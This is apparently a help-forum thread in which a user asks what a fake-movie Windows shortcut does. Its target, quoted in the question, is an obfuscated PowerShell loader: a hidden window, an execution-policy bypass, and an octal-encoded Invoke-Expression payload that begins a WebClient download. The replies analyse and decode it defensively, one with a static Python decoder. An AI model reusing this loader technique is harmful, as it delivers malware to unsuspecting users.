What specifically does this link do, or is it a virus?

6

In Windows 10 I downloaded a file that I thought was a movie, but it was a shortcut with a size of 700 MB.

I see that the target is this

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116

And it was set to start at

%SYSTEMROOT%\System32\WindowsPowerShell\v1.0

What does it do?

Erik

Posted 2018-11-12T14:13:07.380

Reputation: 163

Question was closed 2018-11-12T21:53:42.070

1 -nopr, -wind & byp are all pretty scary... The numbers are forming a bit-shifted URL but I don't have the knowledge to work out what it's trying to get to. – spikey_richie – 2018-11-12T14:35:32.097

Thanks, I actually pressed the link; the PowerShell window briefly popped up, that's all so far. – Erik – 2018-11-12T14:38:42.577

7 It is obviously some sort of malware. The digits are octal numbers which translate into $aspx = ((New-Object System.N, but it would need a lot more of these to be able to work out what it is intended to do. If it has installed a Trojan, such as a key logger, then you won't be aware of its presence. Disconnect from the internet, restart (not reboot) and run a full virus scan (including rootkit scan). Depending on its nature it could have infected other systems in your network. – AFH – 2018-11-12T14:45:21.067

I have McAfee LiveSafe Premium but it did not react. – Erik – 2018-11-12T14:47:46.440

1 Some similar obfuscated code is documented here. – AFH – 2018-11-12T14:59:35.190

Answers

8

It's a malware loader.

It executes PowerShell code beginning with New-Object System.N... (hidden in the numbers), which in full is New-Object System.Net.WebClient; that object will then be used to download and execute the actual malware from the URL that is also hidden in the remaining numbers of the obfuscated code.

If you have already clicked the link, then you're likely already infected, unless the URL was already taken down.

You may try to paste your line into Notepad and then delete everything before ( -JoiN( (, copy the remaining part (beginning with ( -JoiN( (...) and paste it into a PowerShell window. It will disclose the obfuscated PowerShell code that would normally be executed by the preceding $pshOmE[4]+$PShoMe[30]+'X') = iex = Invoke-Expression.

Michał Sacharewicz

Posted 2018-11-12T14:13:07.380

Reputation: 1 944
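The decoding the answer describes can be done statically, without pasting anything into PowerShell. The script below is an added example and is not part of the answer or the original post; it takes the truncated shortcut target exactly as quoted in the question, expands the abbreviated powershell.exe switches (PowerShell accepts any unambiguous prefix of a parameter name or enum value, which is what -NoPr, -WINd, -eXEc and ByP rely on), resolves $PSHOME[4]+$PSHOME[30]+'X' to iex, and converts the octal numbers to text. The value of $PSHOME and the list of powershell.exe parameters it matches against are assumptions about a default 64-bit Windows 10 install.

```python
import re

# Constructed input: the truncated shortcut target exactly as quoted in the question.
LNK_TARGET = (
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP "
    r". ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , "
    r"145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116"
)

# Assumption: $PSHOME as it resolves in a default 64-bit Windows 10 (PowerShell 5.1) session.
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"

# Assumption: subset of powershell.exe parameters that prefix matching can resolve to.
POWERSHELL_PARAMS = [
    "NoProfile", "NonInteractive", "NoLogo", "NoExit", "WindowStyle",
    "ExecutionPolicy", "EncodedCommand", "Command", "File", "Sta", "Mta", "Version",
]
EXECUTION_POLICIES = ["Restricted", "AllSigned", "RemoteSigned", "Unrestricted", "Bypass", "Undefined"]
WINDOW_STYLES = {"0": "Normal", "1": "Hidden", "2": "Minimized", "3": "Maximized"}


def expand_prefix(abbrev, candidates):
    """PowerShell accepts any unambiguous, case-insensitive prefix of a parameter
    name or enum value. Return the single match, or None if ambiguous/unknown."""
    matches = [c for c in candidates if c.lower().startswith(abbrev.lower())]
    return matches[0] if len(matches) == 1 else None


def expand_flags(target):
    """Expand the abbreviated switches that precede the '. (' call operator."""
    head = target.split(" . (", 1)[0]   # everything before the iex invocation
    tokens = head.split()[1:]           # drop the powershell.exe path
    flags, i = {}, 0
    while i < len(tokens):
        tok = tokens[i]
        if not tok.startswith("-"):
            raise ValueError(f"unexpected token {tok!r}")
        name = expand_prefix(tok[1:], POWERSHELL_PARAMS)
        if name == "WindowStyle":
            val = tokens[i + 1]
            flags[name] = WINDOW_STYLES.get(val) or expand_prefix(val, WINDOW_STYLES.values())
            i += 2
        elif name == "ExecutionPolicy":
            flags[name] = expand_prefix(tokens[i + 1], EXECUTION_POLICIES)
            i += 2
        else:
            flags[name or tok] = True
            i += 1
    return flags


def resolve_pshome_expr(expr, pshome=PSHOME):
    """Evaluate a '+'-joined expression of $PSHOME[n] indexes and single-quoted
    literals, e.g. "$pshOmE[4]+$PShoMe[30]+'X'" -> "ieX" (PowerShell is
    case-insensitive, so that is Invoke-Expression)."""
    out = []
    for part in (p.strip() for p in expr.split("+")):
        m = re.fullmatch(r"\$pshome\[(\d+)\]", part, re.IGNORECASE)
        if m:
            out.append(pshome[int(m.group(1))])
        elif len(part) >= 2 and part[0] == part[-1] == "'":
            out.append(part[1:-1])
        else:
            raise ValueError(f"unsupported token {part!r}")
    return "".join(out)


def extract_joined_numbers(target):
    """Return the integer literals inside the -Join( ( ... argument, in order."""
    m = re.search(r"-join\s*\(\s*\((.*)", target, re.IGNORECASE | re.DOTALL)
    if not m:
        raise ValueError("no -Join( ( ... block found")
    return re.findall(r"\d+", m.group(1))


def decode_octal_chars(numbers):
    """Each literal is an octal character code: 44 -> '$', 141 -> 'a', 116 -> 'N'."""
    return "".join(chr(int(n, 8)) for n in numbers)


def analyse(target=LNK_TARGET):
    """Static view of what the shortcut would run, without executing anything."""
    iex_expr = re.search(r"\(\s*(\$pshome\[\d+\][^)]*)\)", target, re.IGNORECASE).group(1)
    return {
        "flags": expand_flags(target),
        "invoker": resolve_pshome_expr(iex_expr).lower(),
        "payload": decode_octal_chars(extract_joined_numbers(target)),
    }


if __name__ == "__main__":
    for key, value in analyse().items():
        print(f"{key}: {value}")
```

On this input the payload decodes to `$aspx = ((New-Object System.N`, the fragment AFH identified in the comments. Pasting only the `-JoiN( (44 ,141, ...` fragment into PowerShell concatenates the digits into one long string (the conversion to characters lives in whatever follows the truncated fragment), which is why decoding offline is more useful. The rest of the command, including the download URL, is stored in the .lnk file's command-line arguments string and should be read with a LNK parser rather than by running the shortcut again.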

Thanks, I got this code: 441411631601704075405050116145167551171421521451431644012317116316414515556116 How can I make something out of this code? – Erik – 2018-11-12T18:25:39.907

1 There are probably additional parts of the code (such as the actual URL) hiding in the shortcut file that are appended to the command when the shortcut is run. – trognanders – 2018-11-12T20:51:35.733

Please pass the complete code, incl. commas. – Michał Sacharewicz – 2018-11-13T10:05:08.713

That is the code I got following your instructions, 441411631601704075405050116..... – Erik – 2018-11-14T08:48:15.920

You're missing something. Please paste whole shortcut code. – Michał Sacharewicz – 2018-11-15T18:13:24.267